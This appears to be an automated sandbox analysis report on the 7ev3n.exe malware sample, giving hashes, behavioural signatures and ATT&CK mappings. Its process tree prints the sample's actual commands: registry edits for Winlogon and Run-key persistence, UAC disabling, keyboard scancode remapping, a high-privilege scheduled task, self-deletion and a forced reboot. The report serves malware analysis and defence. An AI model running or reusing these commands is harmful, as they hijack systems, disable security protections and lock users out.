Analysis
-
max time kernel
117s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-03-2024 01:08
Behavioral task
behavioral1
Sample
7ev3n.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
7ev3n.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Annabelle.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Annabelle.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
BadRabbit.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
BadRabbit.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
Birele.exe
Resource
win10v2004-20240226-en
Errors
General
-
Target
7ev3n.exe
-
Size
315KB
-
MD5
9f8bc96c96d43ecb69f883388d228754
-
SHA1
61ed25a706afa2f6684bb4d64f69c5fb29d20953
-
SHA256
7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
-
SHA512
550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
-
SSDEEP
6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes itself 1 IoCs
pid Process 2712 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2136 system.exe -
Loads dropped DLL 2 IoCs
pid Process 2276 7ev3n.exe 2276 7ev3n.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2692 SCHTASKS.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 1756 shutdown.exe Token: SeRemoteShutdownPrivilege 1756 shutdown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2276 wrote to memory of 2136 2276 7ev3n.exe 28 PID 2276 wrote to memory of 2136 2276 7ev3n.exe 28 PID 2276 wrote to memory of 2136 2276 7ev3n.exe 28 PID 2276 wrote to memory of 2136 2276 7ev3n.exe 28 PID 2136 wrote to memory of 2712 2136 system.exe 29 PID 2136 wrote to memory of 2712 2136 system.exe 29 PID 2136 wrote to memory of 2712 2136 system.exe 29 PID 2136 wrote to memory of 2712 2136 system.exe 29 PID 2136 wrote to memory of 2692 2136 system.exe 31 PID 2136 wrote to memory of 2692 2136 system.exe 31 PID 2136 wrote to memory of 2692 2136 system.exe 31 PID 2136 wrote to memory of 2692 2136 system.exe 31 PID 2136 wrote to memory of 2732 2136 system.exe 33 PID 2136 wrote to memory of 2732 2136 system.exe 33 PID 2136 wrote to memory of 2732 2136 system.exe 33 PID 2136 wrote to memory of 2732 2136 system.exe 33 PID 2136 wrote to memory of 2460 2136 system.exe 34 PID 2136 wrote to memory of 2460 2136 system.exe 34 PID 2136 wrote to memory of 2460 2136 system.exe 34 PID 2136 wrote to memory of 2460 2136 system.exe 34 PID 2136 wrote to memory of 2772 2136 system.exe 36 PID 2136 wrote to memory of 2772 2136 system.exe 36 PID 2136 wrote to memory of 2772 2136 system.exe 36 PID 2136 wrote to memory of 2772 2136 system.exe 36 PID 2136 wrote to memory of 2720 2136 system.exe 39 PID 2136 wrote to memory of 2720 2136 system.exe 39 PID 2136 wrote to memory of 2720 2136 system.exe 39 PID 2136 wrote to memory of 2720 2136 system.exe 39 PID 2136 wrote to memory of 2428 2136 system.exe 40 PID 2136 wrote to memory of 2428 2136 system.exe 40 PID 2136 wrote to memory of 2428 2136 system.exe 40 PID 2136 wrote to memory of 2428 2136 system.exe 40 PID 2136 wrote to memory of 2468 2136 system.exe 42 PID 2136 wrote to memory of 2468 2136 system.exe 42 PID 2136 wrote to memory of 2468 2136 system.exe 42 PID 2136 wrote to memory of 2468 2136 system.exe 42 PID 2732 wrote to memory of 1880 2732 cmd.exe 45 PID 2732 wrote to memory of 1880 2732 cmd.exe 45 PID 2732 wrote to memory of 1880 2732 cmd.exe 45 PID 2732 wrote to memory of 1880 2732 cmd.exe 45 PID 2720 wrote to memory of 2176 2720 cmd.exe 47 PID 2720 wrote to memory of 2176 2720 cmd.exe 47 PID 2720 wrote to memory of 2176 2720 cmd.exe 47 PID 2720 wrote to memory of 2176 2720 cmd.exe 47 PID 2772 wrote to memory of 1332 2772 cmd.exe 46 PID 2772 wrote to memory of 1332 2772 cmd.exe 46 PID 2772 wrote to memory of 1332 2772 cmd.exe 46 PID 2772 wrote to memory of 1332 2772 cmd.exe 46 PID 2468 wrote to memory of 268 2468 cmd.exe 48 PID 2468 wrote to memory of 268 2468 cmd.exe 48 PID 2468 wrote to memory of 268 2468 cmd.exe 48 PID 2468 wrote to memory of 268 2468 cmd.exe 48 PID 2460 wrote to memory of 592 2460 cmd.exe 49 PID 2460 wrote to memory of 592 2460 cmd.exe 49 PID 2460 wrote to memory of 592 2460 cmd.exe 49 PID 2460 wrote to memory of 592 2460 cmd.exe 49 PID 2428 wrote to memory of 532 2428 cmd.exe 50 PID 2428 wrote to memory of 532 2428 cmd.exe 50 PID 2428 wrote to memory of 532 2428 cmd.exe 50 PID 2428 wrote to memory of 532 2428 cmd.exe 50 PID 2136 wrote to memory of 1932 2136 system.exe 55 PID 2136 wrote to memory of 1932 2136 system.exe 55 PID 2136 wrote to memory of 1932 2136 system.exe 55 PID 2136 wrote to memory of 1932 2136 system.exe 55
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\del.bat3⤵
- Deletes itself
PID:2712
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2692
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Modifies WinLogon for persistence
PID:1880
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Adds Run key to start application
PID:592
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵PID:1332
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵PID:2176
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵PID:532
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- UAC bypass
PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:643⤵PID:1932
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:644⤵PID:908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f3⤵PID:2104
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 10 -f4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:1976
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2276
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65B
MD5f727ee128a7eeb23b9c3242b049e61ef
SHA1a260ee1e7c05377830130163737c7609598d61ee
SHA25698bfdb556f8e8a2564cadfd0c62fff7b81b3a70a4f7e03a86f704fabd5d3c884
SHA512c59a537dbd2349d0f29b6596d35c387fbb76a2cde16fddee04c3d861221c2a7a9ef1af67577a63a80523ec4fc079cc64090e3e86544730bf9cdac2ca122a9c0e
-
Filesize
315KB
MD594179bb0b7cc41c3e322867ef0d49bef
SHA159063e891689cdf4b72e97c58d39dbd885085bee
SHA256aa5f8f584d1f4e967f8580a8e507be38248cdad2ed81ae59bddcc9c561c3f1c3
SHA5124bef8fd6f79413378d212cc5f1293becd68b6700d766b65a90d3368cf158c54b45a87dd6e19ed8bb69ed3c73e4c74e81a5f09df77731e8d9b79be8417f9e0a04